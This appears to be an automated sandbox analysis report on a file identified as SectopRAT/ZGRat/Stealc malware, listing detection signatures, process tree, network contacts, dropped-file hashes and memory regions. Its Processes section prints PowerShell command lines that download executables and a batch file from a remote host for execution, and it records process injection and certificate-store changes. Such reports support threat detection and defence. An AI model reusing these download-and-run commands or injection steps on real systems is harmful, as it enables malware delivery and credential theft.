Analysis Overview
SHA256
1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784
Threat Level: Known bad
The file was found to be: Known bad.
Malicious Activity Summary
SectopRAT payload
SectopRAT
ZGRat
Detect ZGRat V1
Stealc
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-26 09:05
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20231129-en
Max time kernel
145s
Max time network
149s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\i1.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2036 set thread context of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 636 set thread context of 2380 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (blob data omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = (blob data omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = (certificate blob omitted; the DER data names the Starfield Class 2 Certification Authority root) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (blob data omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (blob data omitted) | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1fo.0.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe
"C:\Users\Admin\AppData\Local\Temp\u1fo.3.exe"
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.210:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | c.574859385.xyz | udp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| GB | 37.221.125.202:443 | c.574859385.xyz | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| RU | 91.215.85.66:15647 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 185.93.2.244:80 | download.iolo.net | tcp |
| RU | 91.215.85.66:15647 | | tcp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 20.9.155.150:443 | westus2-2.in.applicationinsights.azure.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\nst199A.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\Tar2295.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | cdff232ba5f19245cb3051dbe343475b |
| SHA1 | 48c9413b74bde37f3bf74dd0f807bbf21b019bba |
| SHA256 | 9d6f08844e37d68931921fa518a4bf2af370d581d15a79609f463facfe768ab0 |
| SHA512 | dd03485119dbe18414ccaf9185759e7a6f1c9d942753a573900797c2d74c77c53608ac51773c0d4d4de02d41e2ea357900e703521431a80b48993696d8cd7ea9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 52176d063dcdb67592736cd7a6edec07 |
| SHA1 | de9775a58899fb218fc38981f5b082b7e8e5f5fc |
| SHA256 | 9fb136831780e33c6a600022072fca50448ac1e123224294213dade48489624a |
| SHA512 | c8c56484277122d003044522b28cde8a9c7cd183e4ee4618db8cb1491bfcd6f05e0cf8abe73ef0c5678e2e67a327059dbe4490659b76de15e509a40eec7c1372 |
C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
memory/1072-168-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/1072-169-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/1072-172-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/1072-171-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/1072-170-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/1072-173-0x0000000073C50000-0x00000000741FB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | ac1b1bc5a0cadb408afba338d153f087 |
| SHA1 | c7e6145baa89ea358d5bc9456570645d0193a833 |
| SHA256 | ea37e030af3674aeaa393a3cbc8a8a3e1b2b564e28bf00c644f84e010cc86e3f |
| SHA512 | 7f2d9b03d2ab2ee3c8ec89ad07dfc237737e24195c67f42b9c71e5cdebe1d71e0162ddf0372bbc48352320f73fed61b86d7339f8cef4b0668fe57f23d8c609fe |
memory/476-179-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/476-180-0x0000000002D20000-0x0000000002D60000-memory.dmp
memory/476-181-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/476-183-0x00000000736A0000-0x0000000073C4B000-memory.dmp
\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
memory/1860-188-0x0000000004200000-0x0000000004300000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1860-190-0x0000000000230000-0x000000000029D000-memory.dmp
memory/352-196-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/352-197-0x0000000001FF0000-0x0000000002030000-memory.dmp
memory/352-198-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/352-199-0x0000000001FF0000-0x0000000002030000-memory.dmp
memory/352-200-0x0000000073C50000-0x00000000741FB000-memory.dmp
memory/2668-211-0x0000000002440000-0x0000000002441000-memory.dmp
\Users\Admin\AppData\Local\Temp\u1fo.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
memory/1172-232-0x0000000004480000-0x0000000004580000-memory.dmp
memory/1172-233-0x0000000000220000-0x0000000000247000-memory.dmp
memory/1172-234-0x0000000000400000-0x000000000403C000-memory.dmp
memory/1688-243-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/1688-244-0x0000000002A10000-0x0000000002A50000-memory.dmp
memory/1688-245-0x00000000736A0000-0x0000000073C4B000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fa5db95986bb9c7001ae113d70b3ae47 |
| SHA1 | 589674e9127078d5ebbb8223ffb32ed66e422c1b |
| SHA256 | 0218489b7290909764e3cd262440af40bc99c56528bbc27d7f47ae9d7b0e576e |
| SHA512 | 49c3978137f41572a288806e209f8f806c296f11aba181accd2667a79e6c132d0277f2fcd08fa6047258958f927eee1262e5cbadfc372199bcd3b29d9325af78 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8a122a410326772e8f82875b217ebb1f |
| SHA1 | 7444ffdb59b0df6eba061740b6ae3d0bafaa3a4e |
| SHA256 | bb3d7f0e516db8a5248e39e7aee3bc898736d6b3a7d9f02d7ce7af5d75c401b6 |
| SHA512 | cb8731b4f10c71780da9043c204b8f83850c961ed065cb51fbcf5c5d6821d55335d446d2feee2e7bdf3206f8964835412aac808c6397b54a77f683fcc2b2344d |
memory/1860-321-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1688-322-0x00000000736A0000-0x0000000073C4B000-memory.dmp
memory/1860-342-0x0000000004200000-0x0000000004300000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\U1FO1~1.ZIP
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\u1fo.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u1fo.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u1fo.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
memory/2036-432-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/2036-433-0x0000000077C10000-0x0000000077DB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1fo.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
memory/2036-439-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/1860-440-0x0000000000400000-0x000000000405F000-memory.dmp
memory/2036-441-0x00000000747C0000-0x0000000074934000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4e41388c
| MD5 | a3f64b0f4425cccfbe71b41931a1a3f4 |
| SHA1 | 2fb9d9470c2e1052c226fcf2f2c06e7f35e3105c |
| SHA256 | 8d9a9385fc6af4cbba1ec2c2f07986200c88d5b038519ab08d234f48e2901ec3 |
| SHA512 | 070a370f78fd432edc20f9bdb096f9522f716713b2d08e38389518043b4705f665aa7be34caedf8feaf8a475e1454bf8f4acb6c8f0ce90e3d793b248b9467d3a |
memory/636-443-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/636-445-0x0000000077C10000-0x0000000077DB9000-memory.dmp
memory/636-492-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/636-493-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/636-497-0x00000000747C0000-0x0000000074934000-memory.dmp
memory/2380-498-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2380-495-0x0000000073190000-0x00000000741F2000-memory.dmp
memory/2380-499-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2380-500-0x0000000000400000-0x00000000004C6000-memory.dmp
memory/2380-501-0x0000000072AA0000-0x000000007318E000-memory.dmp
memory/2380-502-0x0000000004CD0000-0x0000000004D10000-memory.dmp
memory/2380-505-0x0000000072AA0000-0x000000007318E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
